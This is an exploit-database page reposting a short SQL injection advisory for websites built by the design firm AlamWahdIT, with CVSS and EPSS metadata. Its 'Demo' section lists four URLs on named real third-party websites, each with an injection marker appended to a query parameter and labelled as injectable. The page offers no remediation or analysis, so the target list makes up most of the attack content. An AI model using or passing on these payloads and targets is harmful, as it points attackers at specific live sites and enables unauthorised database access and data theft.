Advertisement






Design by AlamWahdIT SQL Injection

CVE Category Price Severity
N/A CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') N/A High
Author Risk Exploitation Type Date
alamwahdit High Remote 2020-06-29
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.74977 0.8317

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060125

Below is a copy:

Design by AlamWahdIT SQL Injection
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# Exploit Title : Design by  AlamWahdIT SQL Injection
# Vendor Homepage:  http://www.jz-designs.com/
# Author [ Discovered By ] : Behrouz Mansoori
# Tested On : windows10
# Category : WebApps

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo:

https://maytrade.net/new.php?id=1%27 [SqlInjection]
http://www.kefac.com.eg/product-site-category.php?id=30%27 [SqlInjection]
http://www.oboursina.com/new.php?id=6%27 [SqlInjection]
https://daadour.com/product.php?lang=ar&proid=13%27 [SqlInjection]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum